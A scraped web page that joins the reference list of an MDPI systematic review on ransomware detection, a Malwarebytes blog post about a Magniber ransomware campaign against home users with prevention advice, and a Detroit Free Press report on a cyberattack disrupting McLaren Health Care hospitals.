• Olaimat, M.N.; Maarof, M.A.; Al-rimy, B.A.S. Ransomware anti-analysis and evasion techniques: A survey and research directions. In Proceedings of the 2021 3rd International Cyber Resilience Conference (CRC), Langkawi Island, Malaysia, 29–31 January 2021; pp. 1–6. [ Google Scholar ]
• August, T.; Dao, D.; Niculescu, M.F. Economics of ransomware: Risk interdependence and large-scale attacks. Manag. Sci. 2022 , 68 , 8979–9002. [ Google Scholar ] [ CrossRef ]
• Lee, I.; Roh, H.; Lee, W. Encrypted malware traffic detection using incremental learning. In Proceedings of the IEEE INFOCOM 2020-IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS), Toronto, ON, Canada, 6–9 July 2020; pp. 1348–1349. [ Google Scholar ]
• Mahajan, A.; Chakrabarty, N.; Majithia, J.; Ahuja, A.; Agarwal, U.; Suryavanshi, S.; Biradar, M.; Sharma, P.; Raghavan, B.; Arafath, R.; et al. Multisystem imaging recommendations/guidelines: In the pursuit of precision oncology. Indian J. Med. Paediatr. Oncol. 2023 , 44 , 002–025. [ Google Scholar ] [ CrossRef ]
• Ghouti, L.; Imam, M. Malware classification using compact image features and multiclass support vector machines. IET Inf. Secur. 2020 , 14 , 419–429. [ Google Scholar ] [ CrossRef ]
• Akhtar, M.S.; Feng, T. Malware analysis and detection using machine learning algorithms. Symmetry 2022 , 14 , 2304. [ Google Scholar ] [ CrossRef ]
• Hwang, J.; Kim, J.; Lee, S.; Kim, K. Two-stage ransomware detection using dynamic analysis and machine learning techniques. Wirel. Pers. Commun. 2020 , 112 , 2597–2609. [ Google Scholar ] [ CrossRef ]
• Mezquita, Y.; Alonso, R.S.; Casado-Vara, R.; Prieto, J.; Corchado, J.M. A review of k-nn algorithm based on classical and quantum machine learning. In Distributed Computing and Artificial Intelligence, Special Sessions, 17th International Conference ; Springer: Cham, Switzerland, 2021; pp. 189–198. [ Google Scholar ]
• Saadat, S.; Joseph Raymond, V. Malware classification using CNN-XGBoost model. In Artificial Intelligence Techniques for Advanced Computing Applications: Proceedings of ICACT 2020 ; Springer: Cham, Switzerland, 2021; pp. 191–202. [ Google Scholar ]
• Shah, K.; Patel, H.; Sanghvi, D.; Shah, M. A comparative analysis of logistic regression, random forest and KNN models for the text classification. Augment. Hum. Res. 2020 , 5 , 12. [ Google Scholar ] [ CrossRef ]
• Faruk, M.J.H.; Shahriar, H.; Valero, M.; Barsha, F.L.; Sobhan, S.; Khan, M.A.; Whitman, M.; Cuzzocrea, A.; Lo, D.; Rahman, A.; et al. Malware detection and prevention using artificial intelligence techniques. In Proceedings of the 2021 IEEE International Conference on Big Data (Big Data), Orlando, FL, USA, 15–18 December 2021; pp. 5369–5377. [ Google Scholar ]
• Stoian, N.A. Machine Learning for Anomaly Detection in Iot Networks: Malware Analysis on the Iot-23 Data Set. Bachelor’s Thesis, University of Twente, Enschede, The Netherlands, 2020. [ Google Scholar ]
• Goyal, M.; Kumar, R. The pipeline process of signature-based and behavior-based malware detection. In Proceedings of the 2020 IEEE 5th International Conference on Computing Communication and Automation (ICCCA), Greater Noida, India, 30–31 October 2020; pp. 497–502. [ Google Scholar ]
• Sun, N.; Ding, M.; Jiang, J.; Xu, W.; Mo, X.; Tai, Y.; Zhang, J. Cyber threat intelligence mining for proactive cybersecurity defense: A survey and new perspectives. IEEE Commun. Surv. Tutor. 2023 , 25 , 1748–1774. [ Google Scholar ] [ CrossRef ]
• Sharmeen, S.; Ahmed, Y.A.; Huda, S.; Koçer, B.Ş.; Hassan, M.M. Avoiding future digital extortion through robust protection against ransomware threats using deep learning based adaptive approaches. IEEE Access 2020 , 8 , 24522–24534. [ Google Scholar ] [ CrossRef ]
• Swami, S.; Swami, M.; Nidhi, N. Ransomware Detection System and Analysis Using Latest Tool. Int. J. Adv. Res. Sci. Commun. Technol. 2021 , 7 , 2581–9429. [ Google Scholar ] [ CrossRef ]
• Arabo, A.; Dijoux, R.; Poulain, T.; Chevalier, G. Detecting ransomware using process behavior analysis. Procedia Comput. Sci. 2020 , 168 , 289–296. [ Google Scholar ] [ CrossRef ]
• Manavi, F.; Hamzeh, A. A new method for ransomware detection based on PE header using convolutional neural networks. In Proceedings of the 2020 17th International ISC Conference on Information Security and Cryptology (ISCISC), Tehran, Iran, 9–10 September 2020; pp. 82–87. [ Google Scholar ]
• Singh, D.; Mohanty, N.P.; Swagatika, S.; Kumar, S. Cyber-hygiene: The key concept for cyber security in cyberspace. Test Eng. Manag. 2020 , 83 , 8145–8152. [ Google Scholar ]
• Kitchen, D.E.; Valach, A.P. How to Avoid the Ransomware Onslaught. Natl. Def. 2020 , 105 , 18–19. [ Google Scholar ]
• Möller, D.P. Ransomware Attacks and Scenarios: Cost Factors and Loss of Reputation. In Guide to Cybersecurity in Digital Transformation: Trends, Methods, Technologies, Applications and Best Practices ; Springer: Cham, Switzerland, 2023; pp. 273–303. [ Google Scholar ]
• Berrueta, E.; Morato, D.; Magaña, E.; Izal, M. Crypto-ransomware detection using machine learning models in file-sharing network scenarios with encrypted traffic. Expert Syst. Appl. 2022 , 209 , 118299. [ Google Scholar ] [ CrossRef ]
• Lubin, A. The Law and Politics of Ransomware. Vand. J. Transnat’l L. 2022 , 55 , 1177. [ Google Scholar ]
• Uandykova, M.; Lisin, A.; Stepanova, D.; Baitenova, L.; Mutaliyeva, L.; Yüksel, S.; Dincer, H. The social and legislative principles of counteracting ransomware crime. Entrep. Sustain. Issues 2020 , 8 , 777–798. [ Google Scholar ] [ CrossRef ]
• Force, R.T. Combating Ransomware ; Intel Security Group: Plano, TX, USA, 2021. [ Google Scholar ]
• Ryan, P.; Fokker, J.; Healy, S.; Amann, A. Dynamics of targeted ransomware negotiation. IEEE Access 2022 , 10 , 32836–32844. [ Google Scholar ] [ CrossRef ]
• AlSabeh, A.; Safa, H.; Bou-Harb, E.; Crichigno, J. Exploiting ransomware paranoia for execution prevention. In Proceedings of the ICC 2020-2020 IEEE International Conference on Communications (ICC), Dublin, Ireland, 7–11 June 2020; pp. 1–6. [ Google Scholar ]
• Urooj, U.; Al-rimy, B.A.S.; Zainal, A.; Ghaleb, F.A.; Rassam, M.A. Ransomware detection using the dynamic analysis and machine learning: A survey and research directions. Appl. Sci. 2021 , 12 , 172. [ Google Scholar ] [ CrossRef ]
• Chittooparambil, H.J.; Shanmugam, B.; Azam, S.; Kannoorpatti, K.; Jonkman, M.; Samy, G.N. A review of ransomware families and detection methods. In Recent Trends in Data Science and Soft Computing: Proceedings of the 3rd International Conference of Reliable Information and Communication Technology (IRICT 2018) ; Springer: Cham, Switzerland, 2019; pp. 588–597. [ Google Scholar ]
• Sechel, S. A comparative assessment of obfuscated ransomware detection methods. Inform. Econ. 2019 , 23 , 45–62. [ Google Scholar ] [ CrossRef ]
• Bijitha, C.; Sukumaran, R.; Nath, H.V. A survey on ransomware detection techniques. In Secure Knowledge Management in Artificial Intelligence Era: 8th International Conference, SKM 2019, Goa, India, 21–22 December 2019 ; Proceedings 8; Springer: Cham, Switzerland, 2020; pp. 55–68. [ Google Scholar ]
• Ramesh, G.; Menen, A. Automated dynamic approach for detecting ransomware using finite-state machine. Decis. Support Syst. 2020 , 138 , 113400. [ Google Scholar ] [ CrossRef ]
• Puat, H.A.M.; Abd Rahman, N.A. Ransomware as a service and public awareness. PalArch’s J. Archaeol. Egypt/Egyptol. 2020 , 17 , 5277–5292. [ Google Scholar ]
• Beerman, J.; Berent, D.; Falter, Z.; Bhunia, S. A review of colonial pipeline ransomware attack. In Proceedings of the 2023 IEEE/ACM 23rd International Symposium on Cluster, Cloud and Internet Computing Workshops (CCGridW), Bangalore, India, 1–4 May 2023; pp. 8–15. [ Google Scholar ]
• Zimba, A.; Chishimba, M. On the economic impact of crypto-ransomware attacks: The state of the art on enterprise systems. Eur. J. Secur. Res. 2019 , 4 , 3–31. [ Google Scholar ] [ CrossRef ]
• Liluashvili, G.B. Cyber risk mitigation in higher education. Law World 2021 , 17 , 15. [ Google Scholar ]
• Khammas, B.M. Ransomware detection using random forest technique. ICT Express 2020 , 6 , 325–331. [ Google Scholar ] [ CrossRef ]
• Poudyal, S.; Dasgupta, D. AI-powered ransomware detection framework. In Proceedings of the 2020 IEEE Symposium Series on Computational Intelligence (SSCI), Canberra, ACT, Australia, 1–4 December 2020; pp. 1154–1161. [ Google Scholar ]
• Alqahtani, A.; Gazzan, M.; Sheldon, F.T. A proposed crypto-ransomware early detection (CRED) model using an integrated deep learning and vector space model approach. In Proceedings of the 2020 10th Annual Computing and Communication Workshop and Conference (CCWC), Las Vegas, NV, USA, 6–8 January 2020; pp. 0275–0279. [ Google Scholar ]
• Khan, F.; Ncube, C.; Ramasamy, L.K.; Kadry, S.; Nam, Y. A digital DNA sequencing engine for ransomware detection using machine learning. IEEE Access 2020 , 8 , 119710–119719. [ Google Scholar ] [ CrossRef ]
• Ahmed, Y.A.; Kocer, B.; Al-rimy, B.A.S. Automated analysis approach for the detection of high survivable ransomware. KSII Trans. Internet Inf. Syst. (TIIS) 2020 , 14 , 2236–2257. [ Google Scholar ]
• Davies, S.R.; Macfarlane, R.; Buchanan, W.J. Differential area analysis for ransomware attack detection within mixed file datasets. Comput. Secur. 2021 , 108 , 102377. [ Google Scholar ] [ CrossRef ]
• Noorbehbahani, F.; Saberi, M. Ransomware detection with semi-supervised learning. In Proceedings of the 2020 10th International Conference on Computer and Knowledge Engineering (ICCKE), Mashhad, Iran, 29–30 October 2020; pp. 024–029. [ Google Scholar ]
• Bello, I.; Chiroma, H.; Abdullahi, U.A.; Gital, A.Y.; Jauro, F.; Khan, A.; Okesola, J.O.; Abdulhamid, S.M. Detecting ransomware attacks using intelligent algorithms: Recent development and next direction from deep learning and big data perspectives. J. Ambient. Intell. Humaniz. Comput. 2021 , 12 , 8699–8717. [ Google Scholar ] [ CrossRef ]
• van Boven, L.S.; Kusters, R.W.; Tin, D.; van Osch, F.H.; De Cauwer, H.; Ketelings, L.; Rao, M.; Dameff, C.; Barten, D.G. Hacking acute care: A qualitative study on the health care impacts of ransomware attacks against hospitals. Ann. Emerg. Med. 2024 , 83 , 46–56. [ Google Scholar ] [ CrossRef ]
• Urooj, U.; Maarof, M.A.B.; Al-rimy, B.A.S. A proposed adaptive pre-encryption crypto-ransomware early detection model. In Proceedings of the 2021 3rd International Cyber Resilience Conference (CRC), Langkawi Island, Malaysia, 29–31 January 2021. [ Google Scholar ]
• Roy, K.C.; Chen, Q. Deepran: Attention-based bilstm and crf for ransomware early detection and classification. Inf. Syst. Front. 2021 , 23 , 299–315. [ Google Scholar ] [ CrossRef ]

Share and Cite

Albshaier, L.; Almarri, S.; Rahman, M.M.H. Earlier Decision on Detection of Ransomware Identification: A Comprehensive Systematic Literature Review. Information 2024 , 15 , 484. https://doi.org/10.3390/info15080484

Albshaier L, Almarri S, Rahman MMH. Earlier Decision on Detection of Ransomware Identification: A Comprehensive Systematic Literature Review. Information . 2024; 15(8):484. https://doi.org/10.3390/info15080484

Albshaier, Latifa, Seetah Almarri, and M. M. Hafizur Rahman. 2024. "Earlier Decision on Detection of Ransomware Identification: A Comprehensive Systematic Literature Review" Information 15, no. 8: 484. https://doi.org/10.3390/info15080484

Article Metrics

Article access statistics, further information, mdpi initiatives, follow mdpi.

Subscribe to receive issue release notifications and newsletters from MDPI journals

• MyAccount sign in: manage your personal or Teams subscription >
• Cloud Console sign in: manage your cloud business products >
• Partner Portal sign in: management for Resellers and MSPs >

Magniber ransomware targets home users

If you’ve been following any news about ransomware , you may be under the impression that ransomware groups are only after organizations rather than individual people, and for the most part that’s true.

However, Magniber is one ransomware that does target home users. And it’s back, with full force, demanding four figure ransoms to unencrypt data.

BleepingComputer, which has a dedicated forum for ransomware victims, reports :

“A massive Magniber ransomware campaign is underway, encrypting home users’ devices worldwide and demanding thousand-dollar ransoms to receive a decryptor.”

This surge was confirmed by ID-Ransomware , which helps users to identify the ransomware family that has infected their systems. ID-Ransomware has received well over 700 requests from visitors who had their files encrypted by Magniber since July 20, 2024. Malwarebytes’ telemetry also shows an uptick in Magniber detections in July.

Magniber first emerged in 2017 when it 2024 targeted South Korean systems. In 2018, it started infecting computers with a much more developed version which also targeted other Asian countries like Malaysia, Taiwan, and Hong Kong.

The new campaign does not limit itself to specific regions and uses tried and trusted methods to reach home users’ systems. The ransomware is often disguised in downloads for cracks or key generators of popular software, as well as fake updates for Windows or browsers. In some cases, the group takes advantage of unpatched Windows vulnerabilities.

When infected, victims are presented with this ransom notice:

Your important files have been encrypted due to the suspicion of the illegal content download! Your files are not damaged! Your files are modified only. This modification is reversible. Any attempts to restore your files with the third party software will be fatal to your files! To receive the private key and decryption program follow the instructions below:

The instructions will tell you to visit a website which can only be reached by using the Tor browser .

Once the ransomware has encrypted the targeted files, it will typically request a ransom in the region of $1,000 which is raised to around $5,000 if the victim does not pay within three days. Unfortunately, old decryptors that were available for free don’t work for this version.

How home users can prevent ransomware

There are some rules that can help you avoid falling victim to this type of ransomware:

• Make sure your system and software are on the latest version. Criminals will exploit known holes that have been patched by the vendors but not updated everywhere.
• Run a trusted anti-malware solution .
• Never download illegal software, cracks, and key generators.
• Use a malicious content blocker to stop your browser from visiting bad sites.
• Don’t open unexpected email attachments.
• Don’t click on links before checking where they will take you.

If you do accidentally get caught by ransomware, we recommend you don’t pay. There’s no guarantee you’ll get your files back, and you’ll be helping to line the pockets of criminals.

Malwarebytes Artificial Intelligence module blocks the latest Magniber versions as Malware.AI.{ID-nr}. Older versions will be detected as Ransom.Magniber or Ransom.Magniber.Generic.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by  downloading Malwarebytes today .

SHARE THIS ARTICLE

RELATED ARTICLES

Dozens of Google products targeted by scammers via malicious search ads

August 15, 2024 - In a clever scheme designed to abuse Google in more than one way, scammers are redirecting users to browser locks.

Microsoft patches bug that could have allowed an attacker to revert your computer back to an older, vulnerable version

August 15, 2024 - A researcher used two Windows vulnerabilities to perform downgrade attacks. These flaws have now been patched by Microsoft

We’re making it easier for you to protect your identity 

August 14, 2024 - Announcing our new identity module for Malwarebytes.

X accused of unlawfully using personal data of 60 million+ users to train its AI

August 14, 2024 - Privacy watchdog NOYB has filed complaints against X for using social media data to train its AI chatbot Grok.

Malwarebytes awarded Parent Tested Parent Approved Seal of Approval

August 13, 2024 - Malwarebytes has been awarded the Parent Tested Parent Approved Seal of Approval for product excellence. 

ABOUT THE AUTHOR

Was a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich mahogany and leather-bound books.

Contributors

Threat Center

• Voter Guide
• Michigan Politics
• John Carlisle
• M.L. Elrick
• Observer & Eccentric

Radiation treatments, stroke care resume at McLaren and Karmanos sites after cyberattack

McLaren Health Care was still working to fully restore operations at its 13 Michigan hospitals and medical offices a week after a cyberattack rattled the Grand Blanc-based health system, forcing delays in radiation treatments for cancer patients, diagnostic heart testing, as well as other procedures.

It remained unclear whether the Aug. 5 cyberattack breached the personal data of patients or employees , according to a status update McLaren issued Monday evening.

There also was no timeline for when McLaren's tech systems will be fully restored, McLaren spokesperson David Jones told the Free Press.

"Emergency departments continue to be operational and open to patients arriving for care. A few locations are on ambulance diversion for certain conditions (meaning emergency teams will transport patients to the next closest facility), and those locations remain in regular communication with their local medical control authorities to ensure efficient coordination between facilities," the statement said.

Jones said each hospital's emergency department was working with its local medical control authority to determine on a case-by-case basis when ambulances should be diverted to other hospitals.

"It is only for certain conditions," he said, "and can vary by day and location."

The Comprehensive Stroke Centers at McLaren Flint and McLaren Macomb are fully operational, the health system said, and all radiation therapy units at Karmanos Cancer Institute facilities across Michigan have resumed treating cancer patients.

More: Michigan AG Nessel: Details 'scarce' about what data was leaked in McLaren cyberattack

"Some sites ... started treating patients over the weekend," McLaren's statement said. "This includes Gamma Knife Radiosurgery in Farmington Hills and the McLaren Proton Therapy Center in Flint. Patients whose appointments were delayed should expect a call from their care team, who are working diligently to reschedule appointments."

Though intermittent problems with the telephone system persist, McLaren said its primary and specialty care offices are "largely operational" and patients once again are able to make appointments. In addition, the McLarenNow platform, which is used for virtual medical appointments, is functioning and can be accessed at  mclaren.org/now .

More: McLaren patients say they can't get cancer treatments, heart tests in wake of cyberattack

However, McLaren's statement noted that there are ongoing problems accessing many of its other tech systems, so there could be longer than usual wait times and patients are urged to bring the following paper documents to appointments:

• A list of current medications or empty prescription bottles.
• Printed physician orders for imaging studies or treatments. 
• Printed results of recent lab tests available in the patient portals.
• A list of allergies.

"We remain truly grateful for the tireless effort and dedication displayed by our team members under these demanding circumstances, and we sincerely regret any impact this cyber attack may have had on our patients," the statement said.

This isn't the first time a cyberattack at McLaren has had ripple effects that disrupted patient care.

Last August, a ransomware gang  known as BlackCat/AlphV  claimed responsibility for another attack on McLaren, posting online that it stole 6 terabytes of data, including the personal information of 2.5 million patients.

The health system reported at the time that it had shut down its own computer networks "out of an abundance of caution" after its information technology security team found suspicious activity during routine monitoring.

Jones told the Free Press last week that the current cyberattack is not connected to the previous breach.

The $6.6 billion health system includes 13 hospitals, ambulatory surgery centers and imaging centers, along with pharmacy services and a clinical laboratory network. McLaren employs 28,000 people and more than 113,000 network providers throughout Michigan, Indiana and Ohio and runs commercial and Medicaid health insurance plans, which enroll 732,838 people in Michigan and Indiana.

McLaren says on its website  that it "operates Michigan’s largest network of cancer centers and providers, anchored by the Karmanos Cancer Institute." Karmanos  treats 14,000 new cancer patients  each year.

Contact Kristen Shamus: [email protected]. Subscribe to the Free Press.